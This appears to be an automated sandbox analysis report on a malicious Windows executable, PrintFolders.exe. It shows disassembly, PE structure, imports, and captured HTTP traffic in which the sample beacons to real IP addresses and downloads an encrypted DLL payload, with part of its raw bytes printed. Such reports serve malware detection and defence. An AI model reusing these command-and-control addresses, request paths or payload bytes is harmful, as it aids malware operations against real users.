lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007FB90D364318h
mov edx, dword ptr [ebp-10h]
mov eax, 0040BDD4h
call 00007FB90D360A6Bh
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040BDD4h]
mov dl, 01h
mov eax, 004070C4h
call 00007FB90D36497Bh
mov dword ptr [0040BDD8h], eax
xor edx, edx
push ebp
push 00409D05h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
lea edx, dword ptr [ebp-18h]
mov eax, dword ptr [0040BDD8h]
call 00007FB90D364A53h
mov ebx, dword ptr [ebp-18h]
mov edx, 00000030h
mov eax, dword ptr [0040BDD8h]
call 00007FB90D364B8Dh
mov edx, esi
mov ecx, 0000000Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc000	0x8c8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x263c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf000	0x0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xe000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x8e00	0x8e00	False	0.6218364876760564	data	6.600437911517656	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0xa000	0x248	0x400	False	0.3115234375	data	2.7204325510923035	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xb000	0xe64	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xc000	0x8c8	0xa00	False	0.389453125	data	4.2507970587946735	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xd000	0x8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xe000	0x18	0x200	False	0.052734375	data	0.1991075177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xf000	0x86c	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x10000	0x263c	0x2800	False	0.322265625	data	4.568719834340923	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1030c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	United States
RT_ICON	0x10434	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320	English	United States
RT_ICON	0x1099c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States
RT_ICON	0x10c84	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States
RT_STRING	0x1152c	0x2f2	data
RT_STRING	0x11820	0x30c	data
RT_STRING	0x11b2c	0x2ce	data
RT_STRING	0x11dfc	0x68	data
RT_STRING	0x11e64	0xb4	data
RT_STRING	0x11f18	0xae	data
RT_GROUP_ICON	0x11fc8	0x3e	data	English	United States
RT_VERSION	0x12008	0x3a8	data	English	United States
RT_MANIFEST	0x123b0	0x289	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll	MessageBoxA
oleaut32.dll	VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll	WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetEndOfFile, RemoveDirectoryA, ReadFile, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll	TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll	InitCommonControls
advapi32.dll	AdjustTokenPrivileges

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2022 20:04:06.946058989 CET	49698	80	192.168.2.3	45.139.105.171
Nov 24, 2022 20:04:06.974109888 CET	80	49698	45.139.105.171	192.168.2.3
Nov 24, 2022 20:04:06.974369049 CET	49698	80	192.168.2.3	45.139.105.171
Nov 24, 2022 20:04:06.975188017 CET	49698	80	192.168.2.3	45.139.105.171
Nov 24, 2022 20:04:07.002732992 CET	80	49698	45.139.105.171	192.168.2.3
Nov 24, 2022 20:04:07.008284092 CET	80	49698	45.139.105.171	192.168.2.3
Nov 24, 2022 20:04:07.008407116 CET	49698	80	192.168.2.3	45.139.105.171
Nov 24, 2022 20:04:07.070561886 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.098324060 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.098479033 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.099627018 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.129308939 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.129746914 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.129908085 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.167032003 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.195297956 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195595026 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195625067 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195647955 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195672035 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195697069 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195724964 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195734978 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.195753098 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195776939 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.195781946 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195808887 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195836067 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.195873022 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.195914030 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.223795891 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.223831892 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.223859072 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.223885059 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.223911047 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.223913908 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.223938942 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.223963976 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.223965883 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.223993063 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.224016905 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.224037886 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.224055052 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.224085093 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.224133015 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.251636028 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251678944 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251702070 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251724005 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251743078 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.251748085 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251773119 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251797915 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251797915 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.251797915 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.251820087 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.251822948 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251847982 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251859903 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.251873016 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251887083 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.251902103 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.251909971 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.251938105 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.251966000 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.281215906 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281248093 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281270981 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281295061 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281317949 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281327963 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.281347990 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281378031 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281383991 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.281383991 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.281399012 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281409979 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.281419992 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281443119 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281457901 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.281459093 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.281481028 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.281492949 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.281510115 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.281532049 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.309762955 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.309798956 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.309824944 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.309849977 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.309875965 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.309887886 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.309889078 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.309889078 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.309900999 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.309926033 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.309950113 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.309973001 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.309973001 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.309973001 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.309973955 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.309973955 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.309998989 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.310023069 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.310024023 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.310024023 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.310046911 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.310049057 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.310080051 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.310175896 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338548899 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338596106 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338620901 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338644981 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338660955 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338660955 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338668108 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338694096 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338716984 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338741064 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338758945 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338758945 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338758945 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338758945 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338766098 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338790894 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338790894 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338808060 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338815928 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338826895 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338840008 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.338915110 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338915110 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.338915110 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.366193056 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.366230965 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.366257906 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.366281033 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.366303921 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.366327047 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.366349936 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.366369963 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:07.366432905 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.366503954 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:07.487350941 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:07.516808033 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:07.516962051 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:07.517386913 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:07.547811985 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:08.183096886 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:08.183384895 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:10.274821043 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:10.303235054 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:10.921152115 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:10.921443939 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:12.010909081 CET	80	49698	45.139.105.171	192.168.2.3
Nov 24, 2022 20:04:12.011039972 CET	49698	80	192.168.2.3	45.139.105.171
Nov 24, 2022 20:04:12.314830065 CET	80	49699	107.182.129.235	192.168.2.3
Nov 24, 2022 20:04:12.315078020 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:13.009390116 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:13.037208080 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:13.651431084 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:13.651510000 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:16.725641966 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:16.753967047 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:17.408674002 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:17.408866882 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:19.479399920 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:19.507314920 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:20.138571024 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:20.138660908 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:22.232724905 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:22.263175964 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:22.886122942 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:22.886228085 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:25.004755020 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:25.033701897 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:25.909393072 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:25.909506083 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:27.996823072 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:28.027730942 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:28.684456110 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:28.684699059 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:30.746705055 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:30.777260065 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:31.385026932 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:31.385099888 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:33.849196911 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:33.879093885 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:34.525691032 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:34.525862932 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:36.730756998 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:36.760432005 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:37.394530058 CET	80	49700	171.22.30.106	192.168.2.3
Nov 24, 2022 20:04:37.394788027 CET	49700	80	192.168.2.3	171.22.30.106
Nov 24, 2022 20:04:40.588359118 CET	49699	80	192.168.2.3	107.182.129.235
Nov 24, 2022 20:04:40.588391066 CET	49698	80	192.168.2.3	45.139.105.171
Nov 24, 2022 20:04:40.588444948 CET	49700	80	192.168.2.3	171.22.30.106

HTTP Request Dependency Graph

45.139.105.171

107.182.129.235

171.22.30.106

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49698	45.139.105.171	80	C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 20:04:06.975188017 CET	95	OUT	GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 45.139.105.171 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:07.008284092 CET	95	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49699	107.182.129.235	80	C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 20:04:07.099627018 CET	96	OUT	GET /storage/ping.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 0 Host: 107.182.129.235 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:07.129746914 CET	96	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 17 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 55 77 55 6f 6f 6f 49 49 72 77 67 68 32 34 75 75 55 Data Ascii: UwUoooIIrwgh24uuU
Nov 24, 2022 20:04:07.167032003 CET	96	OUT	GET /storage/extension.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 107.182.129.235 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:07.195595026 CET	98	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:07 GMT Server: Apache/2.4.41 (Ubuntu) Pragma: public Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Transfer-Encoding: binary Content-Length: 94224 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: f9 f1 a9 b8 8b 6d 69 b2 02 e6 7d 3b a6 18 dc 46 22 cd 29 c1 54 8d 11 27 4b 3b 1b ff ec e2 4f bb 59 30 3a cd fb c8 c6 19 33 6a e8 b1 5c 17 49 6a ea 32 52 c5 89 50 17 fc 06 dd 43 07 19 e2 71 a9 7c d1 32 a8 0e fe be ec b3 69 52 32 57 f5 46 e8 b4 ab 43 3d 4d 55 b9 a4 16 cb 8b 9e 85 48 36 99 ea f5 41 e4 94 1a 97 d3 d7 40 7f fa 4f a6 63 1a 89 89 4d 87 78 38 ce 94 d2 e4 b0 4c ae e0 2d 20 c9 88 ab 62 96 84 7c 12 43 b2 c0 e7 8e a4 5a 7d a5 77 d7 94 2e d1 6c 1a 61 cd 61 54 b4 87 c2 a5 62 72 2c 19 c8 18 36 77 23 06 6a c2 50 d9 8c 6c 69 f4 88 3d fc b4 ca 1b 0e c0 6f ac 1e b2 92 93 cf ee 53 e9 7b ab eb 52 94 a4 e6 e4 2e 94 d9 d2 35 d5 a0 15 92 ec a7 23 3b 93 d0 94 82 04 2d fb d3 f1 e8 62 2b 19 e3 8b 47 28 90 3e cb 02 51 05 b9 e0 f5 a5 69 4e 7b 90 2b 79 0c 1d d0 5a 43 e7 ae 7a 33 73 45 cd f0 ae fa 54 0d d3 32 df 4a 10 84 ce 33 bf 39 55 d6 34 26 f6 b2 50 d4 e5 c7 c7 cb d7 b0 e1 89 22 77 49 fa a4 b9 cb e0 40 cb c3 b5 ae da 78 25 3e 90 be 44 0e d5 80 27 7a 09 5e fb 01 d3 d4 5e 28 bc 07 0d a4 87 4e 43 ca 5b 5b 6b d9 0a ba c8 f0 ff 95 eb ca 9c d2 56 5d 47 f1 d2 29 65 0f 7f b4 94 bf 60 c5 c5 d4 ea b1 07 18 ee 4b 2f 4c d0 55 6c 12 19 46 1f 15 22 8a ed 38 24 16 41 64 ef fa aa e4 3a 69 b5 67 a6 f4 30 81 64 db 0f d8 5b 2e a9 cf 54 22 6c 90 55 c0 4d 00 3d 17 30 b1 b0 ef 2c de d9 2c e7 99 83 6b 75 d4 57 2c c3 d1 f7 f9 f3 37 60 51 cf 46 69 3d 77 13 f9 e3 75 f1 dc 3a 8f 97 51 2d ca 52 a0 7d 30 1c c8 eb ac 4c ba ad 82 8f bd 6e c9 0a 1c 74 a4 6e 76 c0 1f eb 06 07 7a c3 c0 18 0c 65 9e e8 49 c0 43 00 01 b3 b6 d2 39 bf 56 8c 7e 31 2b 5b 5d 06 cb 9f 37 f5 04 af 78 51 1d e7 a4 f8 12 02 f6 b0 06 24 81 4c 00 1c 6f e9 65 51 c7 86 2f c8 62 c9 82 f8 5a 96 0c e4 de c1 e4 70 5d 96 3b 69 2a 29 d1 a6 bd 96 23 b9 62 ef 14 f0 25 31 95 ea 11 0d 8c db bf ec f8 40 a0 17 82 47 ff e1 5b 02 97 d9 b7 9b a6 85 0d 2f 00 63 ca 8e 5a 19 f7 ea 08 d1 81 f4 47 95 3a 